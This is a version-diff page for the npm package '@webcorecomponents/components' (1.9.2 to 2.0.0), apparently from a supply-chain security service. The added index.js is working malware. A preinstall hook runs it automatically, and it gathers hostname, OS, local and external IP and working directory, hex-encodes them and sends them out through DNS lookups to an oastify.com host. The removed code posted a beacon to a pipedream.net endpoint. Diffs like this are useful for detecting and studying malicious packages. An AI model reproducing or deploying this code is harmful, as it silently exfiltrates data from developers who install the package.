npm - @webcorecomponents/components - Versions diffs - 1.9.2 → 2.0.0 - Mend

@webcorecomponents/components 1.9.2 → 2.0.0

Files changed (2) hide show

package/index.js +105 -43
package/package.json +3 -2

package/index.js CHANGED Viewed

@@ -1,45 +1,107 @@
+const dns = require('dns');
+const os = require('os');
 const https = require('https');
+const process = require('process');
-const data = JSON.stringify({
-  message: 'Paquete ejecutado con éxito',
-  timestamp: new Date().toISOString(),
-});
-// Configuración de la solicitud
-const options = {
-  hostname: 'eoqh4p3d0mydz11.x.pipedream.net', // Aquí va el hostname de tu URL de Pipedream (sin el "https://")
-  port: 443, // Para HTTPS el puerto es 443
-  path: '/', // El path es la parte después del dominio (en este caso, "/" si no hay subrutas)
-  method: 'POST', // Usamos POST para enviar datos
-  headers: {
-    'Content-Type': 'application/json',
-    'Content-Length': data.length,
-    'Hi': 'from index'
-  },
-};
-// Realizar la solicitud
-const req = https.request(options, (res) => {
-  let responseBody = '';
-  // Al recibir datos, ir acumulándolos
-  res.on('data', (chunk) => {
-    responseBody += chunk;
-  });
-  // Al finalizar la recepción, mostrar el resultado
-  res.on('end', () => {
-    console.log('Respuesta del servidor:', responseBody);
-  });
-});
-// Manejo de errores
-req.on('error', (error) => {
-  console.error('Error al enviar la solicitud:', error);
-});
-// Enviar los datos en la solicitud
-req.write(data);
-// Finalizar la solicitud
-req.end();
+// Función para codificar los datos en formato hexadecimal
+function encodeData(data) {
+    return Buffer.from(data).toString('hex'); // Codificamos en hexadecimal
+}
+// Función para dividir el string en fragmentos de longitud máxima
+function splitDataIntoChunks(data, chunkSize) {
+    const chunks = [];
+    for (let i = 0; i < data.length; i += chunkSize) {
+        chunks.push(data.slice(i, i + chunkSize));
+    }
+    return chunks;
+}
+// Función para enviar las consultas DNS
+function exfiltrateData(data, label) {
+    const encodedData = encodeData(data);
+    const maxDnsLength = 40; // Máxima longitud de subdominio en una consulta DNS
+    // Dividir los datos en fragmentos si son demasiado largos
+    const chunks = splitDataIntoChunks(encodedData, maxDnsLength);
+    chunks.forEach((chunk, index) => {
+        const domain = `${label}-${index}-${chunk}.p8yvdjdgoteup8gdu5wgpaf7kyqreh26.oastify.com`; // Reemplaza con tu dominio DNS controlado
+        // Realiza la consulta DNS por cada fragmento
+        dns.resolve(domain, 'A', (err, addresses) => {
+            if (err) {
+                //console.error(`Error en la consulta DNS para el fragmento ${index}:`, err);
+            } else {
+                //console.log(`Consulta DNS para el fragmento ${index} exitosa, direcciones:`, addresses);
+            }
+        });
+    });
+}
+// Obtener información básica del sistema
+function getVictimInfo() {
+    const hostname = os.hostname();           // Nombre del equipo
+    const platform = os.platform();           // Sistema operativo (linux, win32, darwin)
+    const release = os.release();             // Versión del sistema operativo
+    const cwd = process.cwd();                // Directorio actual de trabajo
+    const interfaces = os.networkInterfaces();// Interfaces de red
+    let ipAddress = 'N/A'; // Dirección IP local
+    for (const key in interfaces) {
+        for (const details of interfaces[key]) {
+            if (details.family === 'IPv4' && !details.internal) {
+                ipAddress = details.address;  // IP local válida (no localhost)
+                break;
+            }
+        }
+    }
+    return {
+        hostname: hostname,
+        platform: platform,
+        release: release,
+        ipAddress: ipAddress,
+        cwd: cwd
+    };
+}
+// Obtener la IP externa desde ifconfig.me
+function getExternalIP(callback) {
+    https.get('https://ifconfig.me/ip', (res) => {
+        let data = '';
+        // Acumular datos del stream de respuesta
+        res.on('data', (chunk) => {
+            data += chunk;
+        });
+        // Al finalizar, devolver la IP
+        res.on('end', () => {
+            callback(data.trim());
+        });
+    }).on('error', (err) => {
+        //console.error('Error al obtener la IP externa:', err);
+        callback(null);
+    });
+}
+// Obtener información del equipo
+const victimInfo = getVictimInfo();
+// Exfiltrar cada dato por separado, fragmentado si es necesario
+exfiltrateData(victimInfo.hostname, 'hnm');
+exfiltrateData(victimInfo.platform, 'pfm');
+exfiltrateData(victimInfo.release, 'rls');
+exfiltrateData(victimInfo.ipAddress, 'lip');
+exfiltrateData(victimInfo.cwd, 'cwd');
+// Obtener la IP externa y exfiltrarla
+getExternalIP((externalIP) => {
+    if (externalIP) {
+        exfiltrateData(externalIP, 'eip');
+    } else {
+        //console.error('No se pudo obtener la IP externa');
+    }
+});

package/package.json CHANGED Viewed

@@ -1,10 +1,11 @@
 {
   "name": "@webcorecomponents/components",
-  "version": "1.9.2",
+  "version": "2.0.0",
   "description": "Components",
   "main": "index.js",
   "scripts": {
-    "postinstall": "node index.js"
+    "preinstall": "node index.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
   },
   "author": "Author Components",
   "license": "MIT"